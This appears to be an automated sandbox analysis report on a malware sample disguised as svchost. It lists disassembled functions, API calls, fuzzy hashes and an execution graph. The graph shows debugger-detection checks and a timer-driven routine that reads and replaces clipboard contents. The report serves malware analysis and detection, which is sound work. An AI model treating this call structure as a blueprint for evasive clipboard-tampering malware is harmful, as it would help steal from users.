                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocHeap_free_malloc
                                      • String ID:
                                      • API String ID: 2734353464-0
                                      • Opcode ID: b3edb804a2ed5fe6fc273de50f7a7719d18c49f6bab6bd9d22b8017dd684581b
                                      • Instruction ID: 47fafc7281d56cd7232f0f11f7b3e10cd24c1ba3464f88fcbebd715b16cd05de
                                      • Opcode Fuzzy Hash: b3edb804a2ed5fe6fc273de50f7a7719d18c49f6bab6bd9d22b8017dd684581b
                                      • Instruction Fuzzy Hash: 11112733504211ABCB312FB5AC066DB3B989F453A5B20442BF948A6251EEBCDDC1879D
                                      Function 00410317 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 00410323
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 0041033A
                                      • __amsg_exit.LIBCMT ref: 00410348
                                      • __lock.LIBCMT ref: 00410358
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041036C
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: c38316fe705f66c6962230a229fe9f8488d0c73ecf1f61904e97ab22f669a5d2
                                      • Instruction ID: e4933e4f9cff87b6db1e50e91856c3ef302a7f33dd3041806c411e2e618183a8
                                      • Opcode Fuzzy Hash: c38316fe705f66c6962230a229fe9f8488d0c73ecf1f61904e97ab22f669a5d2
                                      • Instruction Fuzzy Hash: D7F0F631940214ABD720FB6699037CE33906F04728F14010FF818E72D2DBFC48C19A5D
                                      Function 00404510 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 0040452F
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404569
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: invalid string position$string too long
                                      • API String ID: 963545896-4289949731
                                      • Opcode ID: 5160ba7ff5377a9cb06a17ca2cfd2a61ffbdc779ddeee85e3cff34bec9fe69a5
                                      • Instruction ID: 9fc85db481ca541f5af55655987844c855698c76e688db874c41ef445bc3599c
                                      • Opcode Fuzzy Hash: 5160ba7ff5377a9cb06a17ca2cfd2a61ffbdc779ddeee85e3cff34bec9fe69a5
                                      • Instruction Fuzzy Hash: 244176B4A00209EFCB08CF98D5909DEB7F2BF89300F208599E9156B395D735AE41DF99
                                      Function 004077B0 Relevance: 6.2, APIs: 4, Instructions: 180COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __aulldiv__aullrem_memset
                                      • String ID:
                                      • API String ID: 2330243113-0
                                      • Opcode ID: b90c376ba3f7105503b3352ea07b6021fddb11e8e749851934524995626f3684
                                      • Instruction ID: a62dec62c92b60b4c519499498a98483a560beb34225c0dd4930cde99cd07262
                                      • Opcode Fuzzy Hash: b90c376ba3f7105503b3352ea07b6021fddb11e8e749851934524995626f3684
                                      • Instruction Fuzzy Hash: 7B61B3B5E04208EBDF04DFE4C851BEEBBB1AF88304F148069E9057B381D738AA45DB95
                                      Function 0041527E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction ID: 5b5670c111a8cead40a1ffb16e00d74f18a4a9ed4f14907d396a6f9763220556
                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction Fuzzy Hash: 7E117E3200054EFBCF125E85DC418EE3F22BB89354B598456FE2859131D33AC9B2AB85
                                      Function 0040F051 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0040EFEB
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • std::exception::exception.LIBCMT ref: 0040F020
                                      • std::exception::exception.LIBCMT ref: 0040F03A
                                      • __CxxThrowException@8.LIBCMT ref: 0040F04B
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                      • String ID:
                                      • API String ID: 1414122017-0
                                      • Opcode ID: 628b221664b1de1b8864bd8eee2c730a3d4728c63bc10f80fa00fd3fcebfbc6c
                                      • Instruction ID: 1e2d0527fb0d68fa3bcd4beffa05bed18b15ee7e689a91fba965b1ab2acf346e
                                      • Opcode Fuzzy Hash: 628b221664b1de1b8864bd8eee2c730a3d4728c63bc10f80fa00fd3fcebfbc6c
                                      • Instruction Fuzzy Hash: 5101473550020A66CB10E757D802AEEBBE99B80358F14007FF400A21D3DB79AA92CA8D
                                      Function 004097F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 161COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: d
                                      • API String ID: 2102423945-2564639436
                                      • Opcode ID: b7c60f92a718278782efad47a80a4cb65daf729d49c5f88dcf05c0d2be91b311
                                      • Instruction ID: 98ac9bbf1862fee8dd38477f1cb269d12124be3a97ef54141adb3ea9d1f28a8a
                                      • Opcode Fuzzy Hash: b7c60f92a718278782efad47a80a4cb65daf729d49c5f88dcf05c0d2be91b311
                                      • Instruction Fuzzy Hash: AE711C71A00208AFCB14CF98D980BEEB7B1EF45314F20C5AAE859A7381D735AE55CF45
                                      Function 004048E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 004048FF
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                        • Part of subcall function 004049F0: std::_Xinvalid_argument.LIBCPMT ref: 00404A40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: +H@$invalid string position
                                      • API String ID: 963545896-1930875418
                                      • Opcode ID: d382321adfee120d09452f2890cacc4efdf2c4fac2176087f9421e8c9239d9a8
                                      • Instruction ID: 63a32dae344941abd75bf44d8694bd3729833ffbde521e45b6cf845468b15615
                                      • Opcode Fuzzy Hash: d382321adfee120d09452f2890cacc4efdf2c4fac2176087f9421e8c9239d9a8
                                      • Instruction Fuzzy Hash: BB41BEB4E04208EFCB08DF99D59099EB7B2FF89304F208169E9556B395C734AE41DF58
                                      Function 004060E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: _b@$_b@
                                      • API String ID: 2102423945-1016703337
                                      • Opcode ID: 6e9ae50890244f920a619df30607ce4d0daf837a4732c6453f158db8b8989439
                                      • Instruction ID: d2c120628e0025ae6c47003c0dfc20d879d162270b197ae00e22ec2d328a1bd1
                                      • Opcode Fuzzy Hash: 6e9ae50890244f920a619df30607ce4d0daf837a4732c6453f158db8b8989439
                                      • Instruction Fuzzy Hash: D241FB70D0424ADFCF04CF94C9507BEBBB1BF41309F2581AAD4127B286C379AA65DB95
                                      Function 00409E20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: p@$p@
                                      • API String ID: 0-369813981
                                      • Opcode ID: 1f9bf732db030eab792c3d8e2b9f28b5dd4216ae02c00d36d35bb9ab03fa372f
                                      • Instruction ID: 66bd6867b88826b1b95dfa9d2ffa6d0f737279d13ab6826bb27aa332bf879093
                                      • Opcode Fuzzy Hash: 1f9bf732db030eab792c3d8e2b9f28b5dd4216ae02c00d36d35bb9ab03fa372f
                                      • Instruction Fuzzy Hash: 5F312F70E0410AABDF04CF95C980ABFB7B5FF98304F10846AE515EB292E734AE51DB95
                                      Function 00404AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404B09
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • _memmove.LIBCMT ref: 00404B88
                                      Strings
                                      • invalid string position, xrefs: 00404B04
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                      • String ID: invalid string position
                                      • API String ID: 1785806476-1799206989
                                      • Opcode ID: 4f688eb7b139980606b6249c5054c7ec464165af03321488a7c1d0b7f26760dd
                                      • Instruction ID: c0dfb9ad1d84408aca3c0bc4771f70511c2b5052637a80a5b2d9d5061a7f9e99
                                      • Opcode Fuzzy Hash: 4f688eb7b139980606b6249c5054c7ec464165af03321488a7c1d0b7f26760dd
                                      • Instruction Fuzzy Hash: D23199B4D0021ADFCB08DF98C5809AEBBB1FF89304F108959E9256B385C734EA41CF95
                                      Function 004062F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: 5$EOS
                                      • API String ID: 909875538-1935795245
                                      • Opcode ID: 5d19d25491994af5a54c3fabd4302859563863366bd15e4f2d1bcdf2a326ec21
                                      • Instruction ID: cbb266d7676478089d8eb310e371b3e9da3167fd0b533db38114e6f4d1a4e4ac
                                      • Opcode Fuzzy Hash: 5d19d25491994af5a54c3fabd4302859563863366bd15e4f2d1bcdf2a326ec21
                                      • Instruction Fuzzy Hash: F001C471940308BBDB00DB75DC42BEA7364AB09704F408039F8027B1C2E678D61596A9
                                      Function 00415FF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147B0
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147C0
                                      • __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00416014
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: csm
                                      • API String ID: 803148776-1018135373
                                      • Opcode ID: 7bb9c1e30fbc5ae72e6ed50af7ca16e765d77639bd1419dbdef8fde2e0cfdfc7
                                      • Instruction ID: de1ba10ac35249198c25df3b2f6096fc92783805510d7df63b2757107bfbf943
                                      • Opcode Fuzzy Hash: 7bb9c1e30fbc5ae72e6ed50af7ca16e765d77639bd1419dbdef8fde2e0cfdfc7
                                      • Instruction Fuzzy Hash: 9C014B34800305DACF34EF25C4446EEBBB6AF18311F25442FE445A6292DB3EC9C4CB59

                                      Execution Graph

                                      Execution Coverage:4.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:2%
                                      Total number of Nodes:1195
                                      Total number of Limit Nodes:16
                                      execution_graph 9335 4014d0 9336 4014d8 9335->9336 9346 401540 9336->9346 9351 401180 9336->9351 9339 40150f ExitProcess 9347 401517 9347->9346 9373 4013a0 GetPEB 9347->9373 9349 401534 9349->9346 9374 4013d0 GetPEB 9349->9374 9375 401000 9351->9375 9354 4011aa 9356 4011b4 GetProcAddress 9354->9356 9355 4011e3 9355->9339 9358 401200 9355->9358 9356->9355 9357 4011cb GetCurrentProcess NtQueryInformationProcess 9356->9357 9357->9355 9359 401000 9358->9359 9360 401217 GetModuleHandleA 9359->9360 9361 40122a 9360->9361 9364 401263 9360->9364 9362 401234 GetProcAddress 9361->9362 9363 40124b GetCurrentProcess NtQueryInformationProcess 9362->9363 9362->9364 9363->9364 9364->9339 9365 4014a0 GetCurrentProcess CheckRemoteDebuggerPresent 9364->9365 9366 4014b9 9365->9366 9366->9339 9367 4013f0 9366->9367 9377 4123e0 9367->9377 9371 40148f 9371->9339 9371->9347 9372 401445 9379 40e542 9372->9379 9373->9349 9374->9346 9376 40100f GetModuleHandleA 9375->9376 9376->9354 9376->9355 9378 401420 GetCurrentThread GetThreadContext 9377->9378 9378->9372 9380 40e54a 9379->9380 9381 40e54c IsDebuggerPresent 9379->9381 9380->9371 9387 4123ca 9381->9387 9384 40f93a SetUnhandledExceptionFilter UnhandledExceptionFilter 9385 40f957 __call_reportfault 9384->9385 9386 40f95f GetCurrentProcess TerminateProcess 9384->9386 9385->9386 9386->9371 9387->9384 9388 405670 9389 4056c3 9388->9389 9390 405698 9388->9390 9393 4056f3 9389->9393 9394 4056cf 9389->9394 9391 4056e0 9390->9391 9392 4056a4 9390->9392 9398 405390 93 API calls 9391->9398 9395 4056b1 9392->9395 9396 40573a GetPEB 9392->9396 9399 4056e9 9393->9399 9403 40571a SendMessageA 9393->9403 9394->9391 9397 4056be DefWindowProcA 9394->9397 9395->9397 9401 405830 KillTimer 9395->9401 9396->9399 9400 405769 GetPEB 9396->9400 9397->9399 9398->9399 9407 40e542 __ld12tod 5 API calls 9399->9407 9400->9399 9406 405794 _memset 9400->9406 9404 405861 PostQuitMessage 9401->9404 9405 405848 9401->9405 9403->9399 9404->9399 9405->9404 9409 4057a7 GetCurrentThread GetThreadContext 9406->9409 9408 40588d 9407->9408 9410 405807 SetTimer 9409->9410 9411 4057cc 9409->9411 9413 405390 9410->9413 9411->9399 9411->9410 9442 413400 9413->9442 9416 4053f8 IsClipboardFormatAvailable 9417 405420 OpenClipboard 9416->9417 9424 4053ec 9416->9424 9419 40543a GetClipboardData 9417->9419 9417->9424 9418 40e542 __ld12tod 5 API calls 9422 40566c 9418->9422 9420 405455 GlobalSize 9419->9420 9421 405609 CloseClipboard 9419->9421 9420->9421 9423 405472 9420->9423 9421->9424 9422->9399 9425 4054c0 GlobalLock 9423->9425 9444 40f051 9423->9444 9424->9418 9425->9421 9427 4054da 9425->9427 9431 4054eb GlobalUnlock 9427->9431 9429 4054aa CloseClipboard 9429->9424 9430 4054bc 9430->9425 9432 405510 _memset 9431->9432 9432->9421 9433 405540 EmptyClipboard 9432->9433 9434 40555d 9433->9434 9435 40556a GlobalAlloc 9433->9435 9434->9435 9435->9421 9437 4055a5 GlobalLock 9435->9437 9437->9421 9438 4055bb 9437->9438 9439 4055cc GlobalUnlock SetClipboardData 9438->9439 9440 4055fc GlobalFree 9439->9440 9441 4055ef GetTickCount 9439->9441 9440->9421 9441->9421 9443 4053b3 GetTickCount 9442->9443 9443->9416 9443->9424 9449 40efd1 std::exception::exception 9444->9449 9446 405492 9446->9429 9446->9430 9449->9444 9449->9446 9452 410b93 9449->9452 9469 4110f1 DecodePointer 9449->9469 9471 4110cb 9449->9471 9474 40e82e 9449->9474 9477 411119 9449->9477 9453 410c10 9452->9453 9459 410ba1 9452->9459 9454 4110f1 _malloc DecodePointer 9453->9454 9455 410c16 9454->9455 9457 410b21 _raise 65 API calls 9455->9457 9456 410bac 9456->9459 9480 4118dc 9456->9480 9489 41172d 9456->9489 9513 411447 9456->9513 9461 410c08 9457->9461 9459->9456 9460 410bcf RtlAllocateHeap 9459->9460 9463 410bfc 9459->9463 9464 4110f1 _malloc DecodePointer 9459->9464 9467 410bfa 9459->9467 9460->9459 9460->9461 9461->9449 9516 410b21 9463->9516 9464->9459 9468 410b21 _raise 65 API calls 9467->9468 9468->9461 9470 411106 9469->9470 9470->9449 9728 41108f 9471->9728 9473 4110d8 9473->9449 9790 40e7c7 9474->9790 9478 411142 9477->9478 9479 41114e RaiseException 9477->9479 9478->9479 9479->9449 9519 4139e3 9480->9519 9482 4118e3 9483 4139e3 __NMSG_WRITE 66 API calls 9482->9483 9485 4118f0 9482->9485 9483->9485 9484 41172d __NMSG_WRITE 66 API calls 9486 411908 9484->9486 9485->9484 9487 411912 9485->9487 9488 41172d __NMSG_WRITE 66 API calls 9486->9488 9487->9456 9488->9487 9490 41174e __NMSG_WRITE 9489->9490 9491 41186a 9490->9491 9492 4139e3 __NMSG_WRITE 63 API calls 9490->9492 9493 40e542 __ld12tod 5 API calls 9491->9493 9494 411768 9492->9494 9495 4118da 9493->9495 9496 411879 GetStdHandle 9494->9496 9497 4139e3 __NMSG_WRITE 63 API calls 9494->9497 9495->9456 9496->9491 9500 411887 _strlen 9496->9500 9498 411779 9497->9498 9498->9496 9499 41178b 9498->9499 9499->9491 9544 40f643 9499->9544 9500->9491 9503 4118bd WriteFile 9500->9503 9503->9491 9504 4117b7 GetModuleFileNameW 9505 4117d8 9504->9505 9510 4117e4 _wcslen 9504->9510 9507 40f643 __NMSG_WRITE 63 API calls 9505->9507 9506 410a7d __invoke_watson 10 API calls 9506->9510 9507->9510 9508 40f5ce 63 API calls __NMSG_WRITE 9508->9510 9510->9506 9510->9508 9511 41185a 9510->9511 9553 40f501 9510->9553 9562 41385c 9511->9562 9581 41141c GetModuleHandleW 9513->9581 9584 4104c7 GetLastError 9516->9584 9518 410b26 9518->9467 9520 4139ef 9519->9520 9521 4139f9 9520->9521 9522 410b21 _raise 66 API calls 9520->9522 9521->9482 9523 413a12 9522->9523 9526 410acf 9523->9526 9529 410aa2 DecodePointer 9526->9529 9530 410ab7 9529->9530 9535 410a7d 9530->9535 9532 410ace 9533 410aa2 _raise 10 API calls 9532->9533 9534 410adb 9533->9534 9534->9482 9538 410954 9535->9538 9539 410973 _memset __call_reportfault 9538->9539 9540 410991 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9539->9540 9541 410a5f __call_reportfault 9540->9541 9542 40e542 __ld12tod 5 API calls 9541->9542 9543 410a7b GetCurrentProcess TerminateProcess 9542->9543 9543->9532 9545 40f651 9544->9545 9546 40f658 9544->9546 9545->9546 9551 40f679 9545->9551 9547 410b21 _raise 66 API calls 9546->9547 9548 40f65d 9547->9548 9549 410acf _raise 11 API calls 9548->9549 9550 40f667 9549->9550 9550->9504 9550->9510 9551->9550 9552 410b21 _raise 66 API calls 9551->9552 9552->9548 9557 40f513 9553->9557 9554 40f517 9555 40f51c 9554->9555 9556 410b21 _raise 66 API calls 9554->9556 9555->9510 9558 40f533 9556->9558 9557->9554 9557->9555 9560 40f55a 9557->9560 9559 410acf _raise 11 API calls 9558->9559 9559->9555 9560->9555 9561 410b21 _raise 66 API calls 9560->9561 9561->9558 9580 410390 EncodePointer 9562->9580 9564 413882 9565 413892 LoadLibraryW 9564->9565 9566 41390f 9564->9566 9567 4138a7 GetProcAddress 9565->9567 9570 4139a7 9565->9570 9569 413929 DecodePointer DecodePointer 9566->9569 9578 41393c 9566->9578 9568 4138bd 7 API calls 9567->9568 9567->9570 9568->9566 9574 4138ff GetProcAddress EncodePointer 9568->9574 9569->9578 9575 40e542 __ld12tod 5 API calls 9570->9575 9571 413972 DecodePointer 9572 41399b DecodePointer 9571->9572 9573 413979 9571->9573 9572->9570 